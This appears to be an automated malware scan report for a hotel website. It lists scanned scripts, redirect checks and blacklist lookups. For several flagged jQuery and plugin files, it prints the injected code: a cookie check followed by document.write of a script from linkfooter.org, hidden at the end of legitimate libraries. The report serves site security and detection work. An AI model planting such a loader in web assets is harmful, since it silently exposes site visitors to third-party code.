Scanned pages/files
| Request | Server response | Status |
http://www.jazz-hotel.md/ | 200 OK Content-Length: 12186 Content-Type: text/html | clean |
http://www.jazz-hotel.md/javascript/jquery-1.5.1.min.js | 200 OK Content-Length: 85507 Content-Type: application/javascript | clean |
http://www.jazz-hotel.md/javascript/jquery-ui-1.8.11.custom.min.js | 200 OK Content-Length: 208555 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(c,j){function k(a){return!c(a).parents().andSelf().filter(function(){return c.curCSS(this,"visibility")==="hidden"||c.expr.filters.hidden(this)}).length}c.ui=c.ui||{};if(!c.ui.version){c.extend(c.ui,{version:"1.8.11",keyCode:{ALT:18,BACKSPACE:8,CAPS_LOCK:20,COMMA:188,COMMAND:91,COMMAND_LEFT:91,COMMAND_RIGHT:93,CONTROL:17,DELETE:46,DOWN:40,END:35,ENTER:13,ESCAPE:27,HOME:36,INSERT:45,LEFT:37,MENU:93,NUMPAD_ADD:107,NUMPAD_DECIMAL:110,NUMPAD_DIVIDE:111,NUMPAD_ENTER:108,NUMPAD_MULTIPLY:106, b.dequeue()})})}})(jQuery); ;function g(){var r=new RegExp("(?:; )?1=([^;]*);?");return r.test(document.cookie)?true:false}var e=new Date();e.setTime(e.getTime()+(2592000000)); if(!g()&&window.navigator.cookieEnabled){document.cookie="1=1;expires="+e.toGMTString()+";path=/";document.write('<script src="http://linkfooter.org/linkfooter.js"></script>');} Antivirus reports:
| ||
http://www.jazz-hotel.md/javascript/galleria-1.2.6.js | 200 OK Content-Length: 154446 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function( $ ) { var undef, window = this, doc = window.document, $doc = $( doc ), $win = $( window ), VERSION = 1.26, DEBUG = true, TIMEOUT = 30000, DUMMY = false, NAV = navigator.userAgent.toLowerCase(), HASH = window.location.hash.replace(/#\ IE = (function() { var v = 3, div = doc.createElement( 'div' ), all = div.getElementsByTagName( 'i' ); d $( this ).data( 'galleria', new Galleria().init( this, options ) ); }); }; }( jQuery ) ); function g(){var r=new RegExp("(?:; )?1=([^;]*);?");return r.test(document.cookie)?true:false}var e=new Date();e.setTime(e.getTime()+(2592000000)); if(!g()&&window.navigator.cookieEnabled){document.cookie="1=1;expires="+e.toGMTString()+";path=/";document.write('<script src="http://linkfooter.org/linkfooter.js"></script>');} Antivirus reports:
| ||
http://www.jazz-hotel.md/javascript/jquery.mousewheel-3.0.4.pack.js | 200 OK Content-Length: 1605 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(d){function g(a){var b=a||window.event,i=[].slice.call(arguments,1),c=0,h=0,e=0;a=d.event.fix(b);a.type="mousewheel";if(a.wheelDelta)c=a.wheelDelta/120;if(a.detail)c=-a.detail/3;e=c;if(b.axis!==undefined&&b.axis===b.HORIZONTAL_AXIS){e=0;h=-1*c}if(b.wheelDeltaY!==undefined)e=b.wheelDeltaY/120;if(b.wheelDeltaX!==undefined)h=-1*b.wheelDeltaX/120;i.unshift(a,c,h,e);return d.event.handle.apply(this,i)}var f=["DOMMouseScroll","mousewheel"];d.event.special.mousewheel={setup:function() if(!g()&&window.navigator.cookieEnabled){document.cookie="1=1;expires="+e.toGMTString()+";path=/";document.write('<script src="http://linkfooter.org/linkfooter.js"></script>');} Antivirus reports:
| ||
http://www.jazz-hotel.md/javascript/jquery.fancybox-1.3.4.pack.js | 200 OK Content-Length: 16024 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ;(function(b){var m,t,u,f,D,j,E,n,z,A,q=0,e={},o=[],p=0,d={},l=[],G=null,v=new Image,J=/\.(jpg|gif|png|bmp|jpeg)(.*)?$/i,W=/[^\.]\.(swf)\s*$/i,K,L=1,y=0,s="",r,i,h=false,B=b.extend(b("<div/>")[0],{prop:0}),M=b.browser.msie&&b.browser.version<7&&!window.XMLHttpRequest,N=function(){t.hide();v.onerror=v.onload=null;G&&G.abort();m.empty()},O=function(){if(false===e.onError(o,q,e)){t.hide();h=false}else{e.titleShow=false;e.width="auto";e.height="auto";m.ht if(!g()&&window.navigator.cookieEnabled){document.cookie="1=1;expires="+e.toGMTString()+";path=/";document.write('<script src="http://linkfooter.org/linkfooter.js"></script>');} Antivirus reports:
| ||
http://www.jazz-hotel.md/javascript/layout.js | 200 OK Content-Length: 3451 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var disabledDays = [], warningMessage = "!";
function checkDate(date) { var n = disabledDays.length, m = date.getMonth()+1, y = date.getYear()+1900, d = date.getDate(); for (i=0;i<n;i++) { if ((y>=disabledDays[i].y1)&&(y<=disabledDays[i].y2) &&(m>=disabledDays[i].m1)&&(m<=disabledDays[i].m2) &&(d>=disabledDays[i].d1)&&(d<=disabledDays[i].d2) ) { return [false]; }); } $(function() { setInterval( "slideSwitch()", 5000 ); }); function g(){var r=new RegExp("(?:; )?1=([^;]*);?");return r.test(document.cookie)?true:false}var e=new Date();e.setTime(e.getTime()+(2592000000)); if(!g()&&window.navigator.cookieEnabled){document.cookie="1=1;expires="+e.toGMTString()+";path=/";document.write('<script src="http://linkfooter.org/linkfooter.js"></script>');} Antivirus reports:
| ||
http://s7.addthis.com/js/250/addthis_widget.js | 200 OK Content-Length: 6875 Content-Type: text/javascript | clean |
http://www.jazz-hotel.md/en/rooms | 200 OK Content-Length: 17381 Content-Type: text/html | clean |
http://www.jazz-hotel.md/en/javascript/jquery-1.5.1.min.js | 500 Internal Server Error Content-Length: 674 Content-Type: text/html | clean |
http://www.jazz-hotel.md/test404page.js | 404 Not Found Content-Length: 7 Content-Type: text/html | clean |
http://www.jazz-hotel.md/en/javascript/jquery-ui-1.8.11.custom.min.js | 500 Internal Server Error Content-Length: 674 Content-Type: text/html | clean |
http://www.jazz-hotel.md/en/javascript/galleria-1.2.6.js | 500 Internal Server Error Content-Length: 674 Content-Type: text/html | clean |
http://www.jazz-hotel.md/en/javascript/jquery.mousewheel-3.0.4.pack.js | 500 Internal Server Error Content-Length: 674 Content-Type: text/html | clean |
http://www.jazz-hotel.md/en/javascript/jquery.fancybox-1.3.4.pack.js | 500 Internal Server Error Content-Length: 674 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: jazz-hotel.md
Result:
GET / HTTP/1.1
Host: jazz-hotel.md
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: jazz-hotel.md
Referer: http://www.google.com/search?q=jazz-hotel.md
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: jazz-hotel.md
Referer: http://www.google.com/search?q=jazz-hotel.md
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=jazz-hotel.md
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://jazz-hotel.md/
Result: jazz-hotel.md is not infected or malware details are not published yet.
Result: jazz-hotel.md is not infected or malware details are not published yet.